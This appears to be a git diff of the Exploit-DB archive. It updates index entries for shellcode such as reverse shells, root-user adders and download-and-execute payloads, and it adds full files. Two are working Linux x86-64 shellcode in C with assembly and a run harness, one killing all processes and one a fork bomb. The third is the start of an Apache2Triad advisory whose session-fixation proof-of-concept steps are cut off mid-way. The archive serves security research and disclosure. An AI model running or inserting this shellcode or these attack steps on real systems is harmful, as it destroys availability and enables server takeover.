bytes)",2004-10-25,lion,win_x86,shellcode,0 +13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator)",2004-10-25,lion,win_x86,shellcode,0 13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File + Execute Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind 58821/TCP Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 @@ -16134,7 +16135,7 @@ id,file,description,date,author,platform,type,port 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 -14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Netcat Connectback 8080/TCP Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 +14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0 13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 @@ -16175,7 +16176,7 @@ id,file,description,date,author,platform,type,port 15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 +15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 15879,platforms/win_x86/shellcode/15879.txt,"Win32 - Speaking 'You got pwned!' Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 @@ -16188,8 +16189,8 @@ id,file,description,date,author,platform,type,port 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 17326,platforms/windows/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0 -17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 +17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 @@ -16197,7 +16198,7 @@ id,file,description,date,author,platform,type,port 17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 -18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 +18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 @@ -16228,12 +16229,12 @@ id,file,description,date,author,platform,type,port 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 -34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 +34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 -35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP Password Shell (4444/TCP) Shellcode (81/96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 -35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Connect Shellcode (77-85/90-98 bytes with Password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0 35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 @@ -16292,13 +16293,13 @@ id,file,description,date,author,platform,type,port 38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 -38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind 31173/TCP Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 +38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)",2015-12-13,B3mB4m,generator,shellcode,0 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 -39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind 4444/TCP Password Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 +39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 @@ -16307,7 +16308,7 @@ id,file,description,date,author,platform,type,port 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 +39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 @@ -16344,11 +16345,11 @@ id,file,description,date,author,platform,type,port 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 -40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 +40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 -40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind Shell / Syscall Persistent / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 +40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0 @@ -16366,7 +16367,7 @@ id,file,description,date,author,platform,type,port 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0 -40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind Password (h271508F) 2493/TCP Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 @@ -16409,6 +16410,8 @@ id,file,description,date,author,platform,type,port 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0 42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0 42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -38216,6 +38219,7 @@ id,file,description,date,author,platform,type,port 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0 42291,platforms/php/webapps/42291.txt,"WordPress Plugin WatuPRO 5.5.1 - SQL Injection",2017-07-03,"Manich Koomsusi",php,webapps,0 +42520,platforms/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,php,webapps,0 42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0 42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0 42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0 @@ -38307,3 +38311,15 @@ id,file,description,date,author,platform,type,port 42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0 42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0 +42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42527,platforms/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42528,platforms/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42529,platforms/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42530,platforms/php/webapps/42530.txt,"Joomla! Component FocalPoint 1.2.3 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42531,platforms/php/webapps/42531.txt,"Php Cloud mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",php,webapps,0 +42532,platforms/php/webapps/42532.txt,"Joomla! Component Ajax Quiz 1.8 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42533,platforms/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42534,platforms/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42535,platforms/php/webapps/42535.txt,"PHPMyWind 5.3 - Cross-Site Scripting",2017-08-21,小雨,php,webapps,0 diff --git a/platforms/lin_x86-64/shellcode/42522.c b/platforms/lin_x86-64/shellcode/42522.c new file mode 100755 index 000000000..6ff336afd --- /dev/null +++ b/platforms/lin_x86-64/shellcode/42522.c @@ -0,0 +1,63 @@ +/* +;Title: Linux/x86_64 - kill() All Processes Shellcode +;Author: Touhid M.Shaikh +;Contact: https://github.com/touhidshaikh +;Category: Shellcode +;Architecture: Linux x86_64 +;Description: If pid == -1, then sig is sent to every process for which the +calling process has permission to send signals, except for process 1 (init) +;Shellcode Length: 19 +;Tested on : Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux + + + +===COMPILATION AND EXECUTION Assemmbly file=== + +#nasm -f elf64 shell.asm -o shell.o <=== Making Object File + +#ld shell.o -o shell <=== Making Binary File + +#./bin2shell.sh shell <== xtract hex code from the binary( +https://github.com/touhidshaikh/bin2shell) + +=================SHELLCODE(INTEL FORMAT)================= + +section .text +global _start: +_start: +xor rax,rax +push byte -1 ; pid = -1, +pop rdi +add rax,9 ; sig +mov rsi,rax +add rax,53 ; kill system call number 9+53=62 +syscall + + +===================END HERE============================ + +====================FOR C Compile=========================== + +Compile with gcc with some options. + +# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing + +*/ + +#include +#include + +unsigned char code[] = \ +"\x48\x31\xc0\x6a\xff\x5f\x48\x83\xc0\x09\x48\x89\xc6\x48\x83\xc0\x35\x0f\x05"; + + +main() +{ + +printf("Shellcode Length: %d\n", (int)strlen(code)); + +int (*ret)() = (int(*)())code; + +ret(); + +} diff --git a/platforms/lin_x86-64/shellcode/42523.c b/platforms/lin_x86-64/shellcode/42523.c new file mode 100755 index 000000000..472d44805 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/42523.c @@ -0,0 +1,61 @@ +/* +;Title: Linux/x86_64 - fork() Bomb (11 bytes) +;Author: Touhid M.Shaikh +;Contact: https://twitter.com/touhidshaikh +;Category: Shellcode +;Architecture: Linux x86_64 +;Description: WARNING! this shellcode may crash your computer if executed +in your system. +;Shellcode Length: 11 +;Tested on : Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux + + + +===COMPILATION AND EXECUTION Assemmbly file=== + +#nasm -f elf64 shell.asm -o shell.o <=== Making Object File + +#ld shell.o -o shell <=== Making Binary File + +#./bin2shell.sh shell <== xtract hex code from the binary( +https://github.com/touhidshaikh/bin2shell) + +=================SHELLCODE(INTEL FORMAT)================= + +section .text + global _start: +_start: + xor rax,rax + add rax,57 + syscall + jmp _start + +===================END HERE============================ + +====================FOR C Compile=========================== + +Compile with gcc with some options. + +# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing + +*/ + +#include +#include + + +unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\xeb\xf5"; + +main() +{ + +printf("Shellcode Length: %d\n", (int)strlen(code)); + +int (*ret)() = (int(*)())code; + +ret(); + +} + +/*More Shellcode => Download Link : +https://github.com/touhidshaikh/shellcode/tree/master/Linux */ diff --git a/platforms/php/webapps/42520.txt b/platforms/php/webapps/42520.txt new file mode 100755 index 000000000..abe726b59 --- /dev/null +++ b/platforms/php/webapps/42520.txt @@ -0,0 +1,208 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/APACHE2TRIAD-SERVER-STACK-v1.5.4-MULTIPLE-CVE.txt +[+] ISR: ApparitionSec + + +Vendor: +=============== +apache2triad.net +https://sourceforge.net/projects/apache2triad/ + + + +Product: +=========== +Apache2Triad v1.5.4 + +Apache2Triad spells instant and facile deployment of web software on any windows server along the lines of the WAMP paradigm +in a point and click manner in just minutes and is a ideal solution for the setup of server farms. + + + +Vulnerability Type(s): +====================== +Session Fixation +Cross Site Request Forgery +Persistent Cross Site Scripting + + +CVE Reference: +============== +CVE-2017-12965 (Session Fixation) +CVE-2017-12970 (Cross Site Request Forgery) +CVE-2017-12971 (Persistent Cross Site Scripting) + +This application is old and not actively developed according to the website, yet it is still avail for download so +I release the advisory. + + +Security Issue(S): +================ +CVE-2017-12965 + +Apache2Triad allows remote attackers to set an arbitrary PHPSESSID cookie, if a Apache2Triad user authenticates using the +attacker controlled PHPSESSID the attacker can then access the Apache2Triad Web application with same level of access +as that of the victim to potentially take over the Apache2Triad system. + +e.g. + +Pre - Authentication +a4ce6912be9d29a9ba4106c989859e7b + +Post - Authentication +a4ce6912be9d29a9ba4106c989859e7b + +We see the PHPSESSID is never regenerated, to make matters worse Apache2Triad will happily accept an abitrary attacker +supplied session cookie and persist it. Our evil cookie will get written here "C:\apache2triad\temp" as sess_HACKED123. + +set our cookie like, + +Attacker lure: +Important message + +Victim logs on using our lure. + +HTTP 200 OK +Response cookies +PHPSESSID +value "HACKED123" +path "/" +Request cookies +PHPSESSID "HACKED123" + + +Since we control the PHP Session ID and it persists across applications we can then jump to "phpxmail" +using above session and have an authenticated session avail to do whatever we wish. + +e.g. + +http://VICTIM-IP/phpxmail/?PHPSESSID=HACKED123 + +Now access some arbitrary application resource bypassing normal authentication. +http://VICTIM-IP/phpxmail/main.php?action=servercmd + +Tested successfully in Firefox, IE + + +CVE-2017-12970 + +Remote attackers who can trick an authenticated Apache2Triad user to visit a malicious webpage or link can execute HTTP Requests +on behalf of the authenticated user, attackers can then add or delete arbitrary users to the affected system. + +Tested successfully in Firefox, IE + + +CVE-2017-12971 + +Remote attackers can execute arbitrary code that will run in the security context of the victims browser, if +an authenticated user visits an attacker controlled webpage or link. + +Since Apache2Triad has Session Fixation flaw, we can leverage this to potentially bypass normal authentication. +XSS payload will get written to the "slimftpd.conf" configuration file under "C:\apache2triad\ftp" directory. + +e.g. + +"> + + + + +Tested successfully in Firefox + + +Exploit/POC(s): +============== +CVE-2017-12965 (Session Fixation) + +1) Create lure with a attacker controlled PHPSESSID, something like... + +You have new messages, logon to view + +2) Authenticate to Apache2Triad using that link + +3) Open another Web Browser 